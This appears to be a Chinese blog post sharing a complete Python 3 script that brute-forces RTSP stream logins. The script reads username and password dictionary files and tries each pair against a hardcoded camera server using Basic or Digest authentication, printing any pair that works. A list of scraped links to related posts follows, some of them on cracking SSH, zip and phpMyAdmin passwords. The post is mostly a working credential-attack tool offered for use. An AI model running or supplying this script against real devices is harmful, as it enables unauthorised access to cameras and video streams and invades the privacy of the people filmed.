一、说明
hydra是说已实现了rtsp的爆力破解,但是使用时发现字典中明明已包含正确的用户名密码hydra却还没检测出来;
拦截数据包查看,感觉hydra只是尝试去匿名访问,并没有发送用户名密码去验证,所以自己写了个脚本。
二、脚本代码
rtsp有Basic和Digest两种验证方式,这里默认使用‘Basic’,如果想用‘Digest’方式将代码中的config_dict['brute_force_method']修改为‘Digest’
注意得自己在脚本的同目录下,放好“username.txt”(一行为一个用户名的形式)和"password.txt"(一行为一个密码的形式)两个字典文件
import socket
import hashlib
import base64 #define variables we need
global config_dict
config_dict = {
"server_ip": "10.10.6.94",
"server_port": 554,
"server_path": "/chID=8&streamType=main",
"user_agent": "RTSP Client",
"buffer_len": 1024,
"username_file": "username.txt",
"password_file": "password.txt",
"brute_force_method": 'Basic'
} def gen_base_method_header(auth_64):
global config_dict
#build the prefix of msg to send
str_base_method_header = 'DESCRIBE rtsp://'+config_dict["server_ip"]+':'+str(config_dict["server_port"])+config_dict["server_path"] + ' RTSP/1.0\r\n'
str_base_method_header += 'CSeq: 4\r\n'
str_base_method_header += 'User-Agent: '+config_dict["user_agent"]+'\r\n'
str_base_method_header += 'Accept: application/sdp\r\n'
str_base_method_header += 'Authorization: Basic '+auth_64 + ' \r\n'
str_base_method_header += '\r\n'
return str_base_method_header def base_method_brute_force(socket_send,username,password):
global config_dict
# use base64 to encode username and password
auth_64 = base64.b64encode((username + ":" + password).encode("utf-8")).decode()
# try to auth server
str_base_method_header = gen_base_method_header(auth_64)
socket_send.send(str_base_method_header.encode())
msg_recv = socket_send.recv(config_dict["buffer_len"]).decode()
# if the server response '200 OK' It means the username and password pair is right
if '200 OK' in msg_recv:
print("found key -- " + username + ":" + password) def gen_digest_describe_header():
global config_dict
str_digest_describe_header = 'DESCRIBE rtsp://'+config_dict["server_ip"]+':'+str(config_dict["server_port"])+config_dict["server_path"] + ' RTSP/1.0\r\n'
str_digest_describe_header += 'CSeq: 4\r\n'
str_digest_describe_header += 'User-Agent: '+config_dict["user_agent"]+'\r\n'
str_digest_describe_header += 'Accept: application/sdp\r\n'
str_digest_describe_header += '\r\n'
return str_digest_describe_header def gen_response_value(url,username,password,realm,nonce):
global config_dict
frist_pre_md5_value = hashlib.md5((username + ':' + realm + ':' + password).encode()).hexdigest()
first_post_md5_value = hashlib.md5(('DESCRIBE:' + url).encode()).hexdigest()
response_value = hashlib.md5((frist_pre_md5_value + ':' + nonce + ':' + first_post_md5_value).encode()).hexdigest()
return response_value def gen_digest_describe_auth_header(username,password,realm_value,nonce_value):
global config_dict
url = 'rtsp://' + config_dict['server_ip'] + ':' + str(config_dict['server_port']) + config_dict['server_path']
response_value = gen_response_value(url, username, password,realm_value, nonce_value)
str_describe_auth_header = 'DESCRIBE rtsp://' + config_dict['server_ip'] + ':' + str(config_dict['server_port']) + \
config_dict['server_path'] + ' RTSP/1.0\r\n'
str_describe_auth_header += 'CSeq: 5\r\n'
str_describe_auth_header += 'Authorization: Digest username="' + username + '", realm="' + realm_value + '", nonce="' + nonce_value + '", uri="' + url + '", response="' + response_value + '"\r\n'
str_describe_auth_header += 'User-Agent: ' + config_dict['user_agent'] + '\r\n'
str_describe_auth_header += 'Accept: application/sdp\r\n'
str_describe_auth_header += '\r\n'
return str_describe_auth_header def digest_method_brute_force(socket_send,username,password,realm_value,nonce_value):
global config_dict
str_digest_describe_auth_header = gen_digest_describe_auth_header(username,password,realm_value,nonce_value)
socket_send.send(str_digest_describe_auth_header.encode())
msg_recv = socket_send.recv(config_dict['buffer_len']).decode()
if '200 OK' in msg_recv:
print("found key -- " + username + ":" + password) #create socket to server
socket_send = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socket_send.connect((config_dict["server_ip"],config_dict["server_port"])) #decide use what method to brute force
if config_dict['brute_force_method'] == 'Basic':
print('now use basic method to brute force')
with open(config_dict["username_file"],"r") as usernames:
for username in usernames:
username = username.strip("\n")
with open(config_dict["password_file"],"r") as passwords:
for password in passwords:
password = password.strip("\n")
base_method_brute_force(socket_send, username, password)
else:
print('now use digest method to brute force')
with open(config_dict["username_file"], "r") as usernames:
for username in usernames:
username = username.strip("\n")
with open(config_dict["password_file"], "r") as passwords:
for password in passwords:
password = password.strip("\n")
str_digest_describe_header = gen_digest_describe_header()
socket_send.send(str_digest_describe_header.encode())
msg_recv = socket_send.recv(config_dict['buffer_len']).decode()
realm_pos = msg_recv.find('realm')
realm_value_begin_pos = msg_recv.find('"',realm_pos)+1
realm_value_end_pos = msg_recv.find('"',realm_pos+8)
realm_value = msg_recv[realm_value_begin_pos:realm_value_end_pos]
nonce_pos = msg_recv.find('nonce')
nonce_value_begin_pos = msg_recv.find('"',nonce_pos)+1
nonce_value_end_pos = msg_recv.find('"',nonce_pos+8)
nonce_value = msg_recv[nonce_value_begin_pos:nonce_value_end_pos]
digest_method_brute_force(socket_send, username, password,realm_value,nonce_value)
socket_send.close()
使用Basic方式,运行结果如下:
使用nonce方式,运行结果如下:
参考:
https://www.cnblogs.com/lidabo/p/6472982.html
https://www.cnblogs.com/MikeZhang/archive/2012/10/29/rtspTcpClient_DSS_20121029.html
python3爆力破解rtsp脚本的更多相关文章
-
contos防爆力破解密码
最近看了一篇文章ssh的爆力破解所以自己就做了一下防爆力破解denyhost 下载denyhost的软件包并上传的服务器下载地址https://sourceforge.net/projects/den ...
-
python 暴力破解密码脚本
python 暴力破解密码脚本 以下,仅为个人测试代码,环境也是测试环境,暴力破解原理都是一样的, 假设要暴力破解登陆网站www.a.com 用户 testUser的密码, 首先,该网站登陆的验证要支 ...
-
zip密码破解小脚本
zip密码破解小脚本 博主: 逍遥子 发布时间:2018 年 05 月 31 日 2745次浏览 1 条评论 1074字数 分类: kali 专栏 首页 正文 分享到: 文件源码 import ...
-
python3实现的rtsp客户端脚本
一.说明 此客户端使用python3编写 此客户端实现RTSP的OPTIONS, DESCRIBE, SETUP , PLAY, GET_PARAMETER,TEARDOWN方法,未实现ANNOUNC ...
-
ubuntu python3和python2切换脚本
最近在ubuntu上开发较多,有些工具只能在python2运行,而开发又是在python3上做的开发,所以写个脚本方便在python2和python3之间切换. 切换成python2的文件usepy2 ...
-
基于python3的手机号生成脚本
今天利用业余,自己突发想法来写个手机号码生成的脚本,其实自己用的方法很简单,想必肯定又不少人写的比我的好,我只是自己闲来无聊搞一下, #作者:雷子 #qq:952943386 #日期:2016年7月1 ...
-
Python3设置在shell脚本中自动补全功能的方法
本篇博客将会简短的介绍,如何在ubuntu中设置python自动补全功能. 需求:由于python中的内建函数较多,我们在百纳乘时,可能记不清函数的名字,同时自动补全功能,加快了我们开发的效率. 方法 ...
-
perl6 单线程破解phpmyadmin脚本
use HTTP::UserAgent; my $ua = HTTP::UserAgent.new; my $url = 'http://localhost/phpMyAdmin/index.php' ...
-
Python3.5+selenium(11)脚本模块化&;参数化
mail126.py脚本如下 from selenium import webdriver from time import sleep from model1 import Login driver ...
随机推荐
-
见证历史 -- 2013 NBA 热火夺冠之路有感
见证历史-- 2013 NBA 热火夺冠之路有感今年NBA季后赛从第一轮看起,到最终的热火夺冠,应该看得是最爽的一次.但一些情节和细节,回忆起来,深有感悟. 1. 做人要低调詹宁斯豪言演黑八雄鹿本赛季 ...
-
mysql查询结果导出到文件
方法一: 直接执行命令: mysql> select count(1) from table into outfile '/tmp/test.xls'; Query OK, 31 rows ...
-
mysql Blob存取的一个简单例子
一.得到mysql的连接 这里封装成一个方法,方便后面使用. public Connection getConnection() throws Exception{ String url = &quo ...
-
eclispe使用外部tomcat总结
1. 配置tomcat Servers-->new 配置tomcat的路径,即可 2. 增加/移除application 注意:移除application时请使用"clean" ...
-
[JavaScript] js 复制到剪切板
zeroclipboard官网:https://github.com/zeroclipboard/ZeroClipboard 下载压缩包,得到两个“ZeroClipboard.js”和“ZeroCli ...
-
Hadoop系列005-Hadoop运行模式(下)
本人微信公众号,欢迎扫码关注! Hadoop运行模式(下) 2.3.完全分布式部署Hadoop 1)分析: 1)准备3台客户机(关闭防火墙.静态ip.主机名称) 2)安装jdk 3)配置环境变量 4) ...
-
form表单内容JSON格式转化
form表单提交时,对于Content-type为application/json是提交时需要转换成json格式,据说form enctype=‘application/json’这样就可以,然而在我 ...
-
Java gc中的那些事
我们已经知道Java堆是被所有线程共享的一块内存区域,所有对象实例和数组都在堆栈进行内存分配.为了进行高效的垃圾回收,虚拟机把堆内存划分成新生代年代(旧一代)和永久代(永久代)3个区域. 新生代 新生 ...
-
通过OTA的方式在局域网分发iOS应用
公司的一个项目有Android和iOS的app,Android的下载和安装都很方便,不过iOS有些麻烦,因为项目本身有些限制,主要有以下一些障碍:1.iOS的版本不是通过Appstore分发.2.出于 ...
-
交叉编译zookeeper的C库
原创文章,转载请正确注明本文原始URL及作者. 今天要编译一个zookeeper的C接口,要编译一个TK1版本. 事情经过这这样的:原来用的是zookeeper-3.4.6版本,但是源码中有个函数是汇 ...